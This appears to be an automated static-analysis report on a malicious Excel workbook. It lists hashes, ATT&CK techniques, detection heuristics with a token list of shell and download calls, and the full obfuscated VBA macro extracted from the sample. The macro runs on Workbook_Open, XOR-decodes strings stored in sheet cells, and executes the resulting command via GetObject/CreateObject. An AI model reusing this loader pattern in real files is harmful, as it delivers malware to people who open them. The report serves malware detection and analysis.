Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 f835c2479c49b48f…

Verdict: MALICIOUS
File type: Office (OLE) / .XLS
Size: 41.0 KB
Created: 2023-04-17 15:29:16
Authoring application: Microsoft Excel
First seen: 2023-04-19
MD5: 03b8ee86e2c20dece50fbe6cceaa383d
SHA-1: 6217ec84a2ce57de29e479622cc216c4a4d7384a
SHA-256: f835c2479c49b48fa7af9319d01672c4d8cdb71cc008d82a23a7573bd5d124b8
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is a malicious Excel file containing VBA macros. Opening the workbook triggers the Workbook_Open macro, which calls the Donation subroutine. Donation uses GetObject and CreateObject to instantiate an object, then runs a command constructed from values read from specific cells in the 'o38a' sheet. The reconstructed command is likely responsible for downloading and executing a second-stage payload, as indicated by the high-severity heuristics for CreateObject, GetObject, and p-code auto-execution.

Heuristics (5)

  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    Matched line in script:
    Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4719 bytes
SHA-256: 2cc60a2ac2a96dfae26a53bb2f1a4d09457544c64ffd95e0889affe8ef2a33e0

First 1,000 lines of the extracted script:

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





                                                





                                        Private Raising As String
Private Equation As String





             






                                        Private Surveillance As String
Private CorreCtly As String
Private Plugin As Object

Private Sub Donation()







              







                 Dim Berkeley As String, Hispanic As String, RogeRs As String, Shoulder As String







                                                                GoTo Hispanic





Railway:
Berkeley = Herein(Raising): Hispanic = Herein(Equation): RogeRs = Herein(Surveillance): Shoulder = Herein(CorreCtly)
Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)






                GoTo Wisdom
Hispanic:
Raising = Sheets("o38a").Range("H152").Value: Equation = Sheets("o38a").Range("E107").Value: Surveillance = Sheets("o38a").Range("J159").Value: CorreCtly = Sheets("o38a").Range("G193").Value
GoTo Railway
Wisdom:





                                                        Plugin.Run RogeRs & " " & Hispanic, 0
End Sub








                                                                            






           Sub Workbook_Open()
GoTo Madonna





                Dim Northeast As String






          Northeast = InputBox("enter the first number")
Dim Decline As String








                                                            Decline = InputBox("enter the last number")







                                                    MsgBox Northeast







          MsgBox Decline
Madonna:





                                                                        If Northeast = "" Then
Donation






                                            End If
End Sub
Private Function Thesis(ByVal Workforce As String) As Variant








                   Dim Belief() As Byte, i As Long, Athens As Integer
i = 0: ReDim Belief(0 To (Len(Workforce) / 2)) As Byte





Northeast:





             If i < Len(Workforce) Then







                                                Athens = Athens + 1
Belief(Athens - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Workforce, i + 1, 2)






                                                                        i = i + 2
GoTo Northeast
Else





                                                                    





            GoTo Decline





                                                    End If
Decline:
Thesis = Belief
End Function
Private Function Herein(ByVal NutteN As String) As Variant
Dim EnvironmEnts As Long: EnvironmEnts = 0: Dim Devil() As Byte: Dim StringS() As Byte, Belief As String, Athens As Integer
StringS = "g31657dbfc"







                                        







                 GoTo SwitcheS








ObligatiOns:







                                                                        Dim Decline As String
Decline = InputBox("put calc number")
MsgBox Decline







TableT:
If EnvironmEnts < UBound(Devil) Then
Athens = EnvironmEnts Mod (10)
GoTo Berkeley
Hispanic:







                 




                                                                            Belief = Belief & Chr(Devil(EnvironmEnts))
EnvironmEnts = EnvironmEnts + 1
GoTo TableT





                Else







                  GoTo Meals
End If





Workforce:
MsgBox "err -52525"







                                                            Dim Northeast As String
Northeast = InputBox("")
MsgBox Northeast
Meals:
Herein = Belief







           Exit Function
SwitcheS:
Devil = Thesis(NutteN)
GoTo TableT
Berkeley:
Devil(EnvironmEnts) = Abs(Devil(EnvironmEnts) Xor StringS(Athens * 2))





                                                        GoTo Hispanic
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True